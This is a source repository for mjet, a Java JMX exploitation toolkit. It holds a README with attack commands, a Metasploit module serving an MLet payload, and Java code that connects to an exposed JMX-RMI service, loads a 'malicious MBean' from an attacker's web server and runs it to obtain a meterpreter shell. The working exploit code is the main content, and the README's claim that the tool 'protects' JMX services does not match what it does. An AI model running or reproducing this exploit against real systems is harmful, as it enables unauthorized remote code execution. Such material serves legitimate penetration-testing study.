Repository: mogwaisec/mjet
Branch: master
Commit: 20210c1286a9
Files: 15
Total size: 14.5 KB
Directory structure:
gitextract_d35drckt/
├── LICENSE
├── README.md
├── metasploit/
│ └── java_mlet_server.rb
├── mjet.jar
└── src/
└── java/
├── metasploit/
│ └── MetasploitBean/
│ ├── .classpath
│ ├── .project
│ ├── .settings/
│ │ └── org.eclipse.jdt.core.prefs
│ └── src/
│ └── metasploit/
│ ├── Metasploit.java
│ ├── MetasploitMBean.java
│ └── Payload.java
└── mjet/
├── .classpath
├── .project
├── .settings/
│ └── org.eclipse.jdt.core.prefs
├── lib/
│ └── commons-cli-1.2.jar
└── src/
└── de/
└── mogwaisecurity/
└── lab/
└── mjet/
└── Mjet.java
================================================
FILE CONTENTS
================================================
================================================
FILE: LICENSE
================================================
The MIT License (MIT)
Copyright (c) 2015 Mogwai Security
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
================================================
FILE: README.md
================================================
# mjet
Mogwai Security Java Management Extensions (JMX) Exploitation Toolkit
mjet is a tool that can be used to protect insecure configured JMX services. It is based on
the blog post "Exploiting JMX-RMI" from Braden Thomas/Accuvant "http://www.accuvant.com/blog/exploiting-jmx-rmi"
and can be used to execute arbitrary Metasploit payloads on the target system.
Mjet was originally planned to be a complete attack toolkit, however we noticed that the Metasploit Github repository contains
a pull request which will provide basic Java RMI/serialization support in native ruby. This is awesome and removes the Java
dependency. So we stopped developing this tool and create metasploit modules in the near future.
mjet consists of the following parts:
- A metasploit module which emulates a "mlet Server". This is basically a web server which hosts a html file that contains a mlet tag
- A ManagedBean that is changed by the mlet server module to include the selected payload
- A jar archive that is used to contact the insecure JMX service.
### Installation (with the github version of Metasploit)
- Copy the "MBean" folder to "data/java/metasploit"
- Copy java_mlet_server.rb to "modules/exploits/multi/misc/"
### Usage
The example uses following systems:
attacker: 192.168.178.1
target: 192.168.178.200, JMX service running on tcp port 1616
- Configure/start the metasploit module "java_mlet_server". The module will run as a background job
```
msf > use exploit/multi/misc/java_mlet_server
msf > set LHOST 192.168.178.1
msf > set SRVHOST 192.168.178.1
msf > set URIPATH /mlet/
msf > run
```
Use mjet.jar to connect to the vulnerable JMX service and provide the URL to the MLet Web server...
```
java -jar mjet.jar -t 192.168.178.200 -p 1616 -u http://192.168.178.1:8080/mlet/
---------------------------------------------------
MJET - Mogwai Security JMX Exploitation Toolkit 0.1
---------------------------------------------------
[+] Connecting to JMX URL: service:jmx:rmi:///jndi/rmi://192.168.178.200:1616/jmxrmi ...
[+] Connected: rmi://192.168.178.164 5
[+] Trying to create MLet bean...
[+] Loaded javax.management.loading.MLet
[+] Loading malicious MBean from http://192.168.178.1:8080/mlet/
[+] Invoking: javax.management.loading.MLet.getMBeansFromURL
[+] Loaded class: metasploit.Metasploit
[+] Loaded MBean Server ID: ptIIirfM:name=BlPwaoHu,id=oWTqfkbE
[+] Invoking: metasploit.Metasploit.run()
[+] Done
```
and enjoy your meterpreter shell :-)
================================================
FILE: metasploit/java_mlet_server.rb
================================================
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'rex'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpServer::HTML
def initialize( info = {} )
super( update_info( info,
'Name' => 'Java Mlet Server',
'Description' => %q{
This module abuses the JMX classes from a Java Applet to run arbitrary Java
code outside of the sandbox as exploited in the wild in January of 2013. The
vulnerability affects Java version 7u10 and earlier.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Unknown', # Vulnerability discovery
'egypt', # Metasploit module
'sinn3r', # Metasploit module
'juan vazquez' # Metasploit module
],
'References' =>
[
[ 'CVE', '2013-0422' ]
],
'Platform' => %w{ java linux osx win },
'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
'Targets' =>
[
[ 'Generic (Java Payload)',
{
'Platform' => ['java'],
'Arch' => ARCH_JAVA,
}
],
[ 'Windows x86 (Native Payload)',
{
'Platform' => 'win',
'Arch' => ARCH_X86,
}
],
[ 'Mac OS X x86 (Native Payload)',
{
'Platform' => 'osx',
'Arch' => ARCH_X86,
}
],
[ 'Linux x86 (Native Payload)',
{
'Platform' => 'linux',
'Arch' => ARCH_X86,
}
],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Jan 10 2013'
))
end
def setup
path = File.join(Msf::Config.data_directory, "java", "metasploit", "MBean", "Metasploit.class")
@mbean_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }
path = File.join(Msf::Config.data_directory, "java", "metasploit", "MBean", "MetasploitMBean.class")
@interface_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }
#@exploit_class_name = rand_text_alpha("Exploit".length)
#@exploit_class.gsub!("Exploit", @exploit_class_name)
super
end
def on_request_uri(cli, request)
print_status("handling request for #{request.uri}")
case request.uri
when /\.jar$/i
jar = payload.encoded_jar
jar.add_file("metasploit/Metasploit.class", @mbean_class)
jar.add_file("metasploit/MetasploitMBean.class", @interface_class)
#metasploit_str = rand_text_alpha("metasploit".length)
#payload_str = rand_text_alpha("payload".length)
#jar.entries.each { |entry|
# entry.name.gsub!("metasploit", metasploit_str)
# entry.name.gsub!("Payload", payload_str)
# entry.data = entry.data.gsub("metasploit", metasploit_str)
# entry.data = entry.data.gsub("Payload", payload_str)
#}
jar.build_manifest
send_response(cli, jar, { 'Content-Type' => "application/octet-stream" })
when /\/$/
payload = regenerate_payload(cli)
if not payload
print_error("Failed to generate the payload.")
send_not_found(cli)
return
end
send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })
else
send_redirect(cli, get_resource() + '/', '')
end
end
def generate_html
html = %Q||
# return html
end
end
================================================
FILE: src/java/metasploit/MetasploitBean/.classpath
================================================
================================================
FILE: src/java/metasploit/MetasploitBean/.project
================================================
MetasploitBean
org.eclipse.jdt.core.javabuilder
org.eclipse.jdt.core.javanature
================================================
FILE: src/java/metasploit/MetasploitBean/.settings/org.eclipse.jdt.core.prefs
================================================
eclipse.preferences.version=1
org.eclipse.jdt.core.compiler.codegen.inlineJsrBytecode=enabled
org.eclipse.jdt.core.compiler.codegen.targetPlatform=1.6
org.eclipse.jdt.core.compiler.codegen.unusedLocal=preserve
org.eclipse.jdt.core.compiler.compliance=1.6
org.eclipse.jdt.core.compiler.debug.lineNumber=generate
org.eclipse.jdt.core.compiler.debug.localVariable=generate
org.eclipse.jdt.core.compiler.debug.sourceFile=generate
org.eclipse.jdt.core.compiler.problem.assertIdentifier=error
org.eclipse.jdt.core.compiler.problem.enumIdentifier=error
org.eclipse.jdt.core.compiler.source=1.6
================================================
FILE: src/java/metasploit/MetasploitBean/src/metasploit/Metasploit.java
================================================
package metasploit;
public class Metasploit implements MetasploitMBean {
public void run() {
Payload.main(null);
}
}
================================================
FILE: src/java/metasploit/MetasploitBean/src/metasploit/MetasploitMBean.java
================================================
package metasploit;
public interface MetasploitMBean {
public void run();
}
================================================
FILE: src/java/metasploit/MetasploitBean/src/metasploit/Payload.java
================================================
package metasploit;
public class Payload {
public static void main(String[] args) {
System.out.println("bla bla bla");
}
}
================================================
FILE: src/java/mjet/.classpath
================================================
================================================
FILE: src/java/mjet/.project
================================================
mjet
org.eclipse.jdt.core.javabuilder
org.eclipse.jdt.core.javanature
================================================
FILE: src/java/mjet/.settings/org.eclipse.jdt.core.prefs
================================================
eclipse.preferences.version=1
org.eclipse.jdt.core.compiler.codegen.inlineJsrBytecode=enabled
org.eclipse.jdt.core.compiler.codegen.targetPlatform=1.6
org.eclipse.jdt.core.compiler.codegen.unusedLocal=preserve
org.eclipse.jdt.core.compiler.compliance=1.6
org.eclipse.jdt.core.compiler.debug.lineNumber=generate
org.eclipse.jdt.core.compiler.debug.localVariable=generate
org.eclipse.jdt.core.compiler.debug.sourceFile=generate
org.eclipse.jdt.core.compiler.problem.assertIdentifier=error
org.eclipse.jdt.core.compiler.problem.enumIdentifier=error
org.eclipse.jdt.core.compiler.source=1.6
================================================
FILE: src/java/mjet/src/de/mogwaisecurity/lab/mjet/Mjet.java
================================================
package de.mogwaisecurity.lab.mjet;
import org.apache.commons.cli.*;
import javax.management.remote.*;
import javax.management.*;
import java.util.*;
public class Mjet {
/**
* @param args
*/
public static void main(String[] args) {
System.out.println("---------------------------------------------------");
System.out.println("MJET - Mogwai Security JMX Exploitation Toolkit 0.1");
System.out.println("---------------------------------------------------");
System.out.println();
CommandLineParser parser = new org.apache.commons.cli.BasicParser();
Options cmdOptions = createCmdOptions();
CommandLine cmd= null;
try {
cmd = parser.parse(cmdOptions, args);
}
catch(ParseException exp) {
System.err.println( "[-] Error: " + exp.getMessage());
System.err.println();
// automatically generate the help statement
HelpFormatter formatter = new HelpFormatter();
formatter.printHelp( "mjet", cmdOptions );
System.exit(1);
}
pwnJMXService(cmd);
}
private static Options createCmdOptions()
{
Options cmdOptions = new Options();
// Required arguments
Option targetOption = OptionBuilder.withArgName("host").hasArg().withDescription("target host").isRequired(true).create('t');
Option portOption = OptionBuilder.withArgName("port").hasArg().withDescription("target service port").isRequired(true).create('p');
Option urlOption = OptionBuilder.withArgName("url").hasArg().withDescription("url of the mlet web server").isRequired(true).create('u');
targetOption.setLongOpt("target");
portOption.setLongOpt("port");
urlOption.setLongOpt("url");
cmdOptions.addOption(targetOption);
cmdOptions.addOption(portOption);
cmdOptions.addOption(urlOption);
// Optional arguments
Option helpOption = new Option("help", false, "show this help");
cmdOptions.addOption(helpOption);
return cmdOptions;
}
static void pwnJMXService(CommandLine line) {
try {
String serverName = line.getOptionValue("t");
String servicePort = line.getOptionValue("p");
String mLetUrl = line.getOptionValue("u");
JMXServiceURL url = new JMXServiceURL("service:jmx:rmi:///jndi/rmi://" + serverName + ":" + servicePort + "/jmxrmi");
System.out.println("[+] Connecting to JMX URL: "+url +" ...");
JMXConnector connector = JMXConnectorFactory.connect(url);
MBeanServerConnection mBeanServer = connector.getMBeanServerConnection();
System.out.println("[+] Connected: " + connector.getConnectionId());
ObjectInstance payloadBean = null;
System.out.println("[+] Trying to create MLet bean...");
ObjectInstance mLetBean = null;
try {
mLetBean = mBeanServer.createMBean("javax.management.loading.MLet", null);
} catch (javax.management.InstanceAlreadyExistsException e) {
mLetBean = mBeanServer.getObjectInstance(new ObjectName("DefaultDomain:type=MLet"));
}
System.out.println("[+] Loaded "+mLetBean.getClassName());
System.out.println("[+] Loading malicious MBean from " + mLetUrl);
System.out.println("[+] Invoking: "+mLetBean.getClassName() + ".getMBeansFromURL");
Object res = mBeanServer.invoke(mLetBean.getObjectName(), "getMBeansFromURL",
new Object[] { mLetUrl },
new String[] { String.class.getName() }
);
HashSet res_set = ((HashSet)res);
Iterator itr = res_set.iterator();
Object nextObject = itr.next();
if (nextObject instanceof Exception) {
throw ((Exception)nextObject);
}
payloadBean = ((ObjectInstance)nextObject);
System.out.println("[+] Loaded class: "+ payloadBean.getClassName());
System.out.println("[+] Loaded MBean Server ID: "+ payloadBean.getObjectName());
System.out.println("[+] Invoking: "+ payloadBean.getClassName()+".run()");
mBeanServer.invoke(payloadBean.getObjectName(), "run", new Object[]{}, new String[]{});
System.out.println("[+] Done");
} catch (Exception e) {
e.printStackTrace();
}
}
}